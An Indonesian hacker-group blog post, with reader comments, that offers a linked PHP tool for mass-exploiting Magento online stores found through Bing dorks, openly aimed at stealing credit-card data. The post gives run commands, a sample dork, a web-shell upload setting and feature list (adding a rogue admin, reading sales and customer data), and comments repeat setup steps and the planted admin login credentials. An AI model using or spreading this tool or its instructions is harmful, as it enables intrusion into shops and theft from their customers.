Tuesday, 13 September 2016

Magento Bot with Bing Dorker

Assalamualaikum, selamat malam gannnn......
Sorry baru ini gua posting lagi di karenakan sekarang udah jarang dpt exploit" fresh wkwkwkk dan bingung juga mau bikin tutor apa. :v

Okee gausah panjang lebar, dalam kesempatan kali ini gua pgn share sebuah tools untuk para Logger yang doyan mainan magento buat cari cc dll :v.

Ini dia penampakan toolsnya:

Tools ini sudah dibuat sedimikian rupa dan pastinya enak dipake :v aman gaada logger karena gua share secara [open source] :).
Dalam tools ini, gua menggabungkan beberapa tools sekaligus + membuatnya semakin mudah dengan memakai Bing Dorker. ( duduk tenang aja gannn, masukin dork -> tunggu mangsa hehehehe :D ).

fitur:
- Magento Add Admin Xploit
=> detect filesystem
=> detect downloader+permission
=> get info average order,lifetime sales,quantity order
=> get info total customers
=> get info installed packages.
- Magento Webforms Xploit

Link-> http://pastebin.com/aGh7w1Ub

*NB: usage: php namafile.php 'bing_dorker'
*NB: php magento.php '"/customer/account/login" site:it'
*NB: $shell = "id.php"; // ganti id.php dengan shell kalian yang berada dalam 1 Folder dengan tools ini *NB: INGET DISINI KITA PAKE DORK BING, BUKAN GOOGLE DORK!!!
dalam tools ini, result target yang berhasil di exploit tidak otomatis tersimpan dalam sebuah file.txt, jadi kalian harus cek 1 1 target kalian yang berhasil di exploit di Terminal/CMD nya langsung. ( maaf gan, ga kepikiran , keburu di publish wkwkw )

Oke sekian duluuu,
Thanks to: Mr. Magnom ( for bing dorker )
Greetz: IndoXploit - Sanjungan Jiwa - Jloyal - Jancok Sec - Res7ock Crew

26 komentar:

  1. ini kenapa ya min http://prnt.sc/chkqca

    ReplyDelete
    Replies
    1. Bantu jawab

      Itu dork bing gan bukan di tulis bing hehehe

      Delete
    2. solved gan, iya ane tau, sengaja itu, ane test ping bing.com eh general failure, karena diblock firewall, yasudah ane offin firewallnya , solved deh :v

      Delete
  2. berarti 'bing_dorker' itu buat naro dork bingnya?

    ReplyDelete
  3. Josss
    Bgi smtp bg ;;)
    Abilganas12@gmail.com

    ReplyDelete
  4. maksud no 4 gmn om?? apa harus punya sell dulu ??

    ReplyDelete
  5. waduh om :v berarti harus pantengin terus ini ya result dari magentonya karna gak tersimpan hasilnya tapi nice om

    ReplyDelete
  6. dork bing gimana ya ane 0 site terus

    ReplyDelete
  7. Mas ane bingung jalanin file php di terminal/cmd bisa di kasih tutor gak?

    ReplyDelete
    Replies
    1. pake windows?
      0. install xampp dulu:
      1. jalanin apache nya.
      2. taro file di c:/xampp/php.
      3. buka cmd
      4. C:/xampp/php> php namafile.php 'bing_dork'

      Delete
  8. ini kok pointingnya masih sama ya aku stuck di 97result dan nama domain yg di exploit pun sama :3

    ReplyDelete
    Replies
    1. bersihkan cookie file nya dulu gan

      Delete
  9. ini kok di block gini ya http://prntscr.com/dbz31a
    cara atasinya gmna

    ReplyDelete
    Replies
    1. 1. jalanin apache nya.
      2. taro file di c:/xampp/php.
      3. buka cmd
      4. C:/xampp/php> php namafile.php 'bing_dork'

      Delete
  10. itu "dummy" => "", apaan kak ?

    ReplyDelete
  11. scriptnya eror kah ?
    gk bisa dijalankan di linux :v

    ReplyDelete
  12. pas udh sukse masuk magentony pake user pass lagi gk?
    kalo pake user pass lagi
    user passny apa

    ReplyDelete
    Replies
    1. kan tertera di exploiternya gan.
      user: indoxploit
      pass: IndoXploit

      Delete
  13. jjk min, ini masih work kah min ?

    ReplyDelete
  14. min cari dork bing nya di mana ya?? di exploit-DB ada kgk??

    ReplyDelete

 

Copyright @ 2016 INDOXPLOIT CODERS TEAM

Designed by Templateiy & CollegeTalks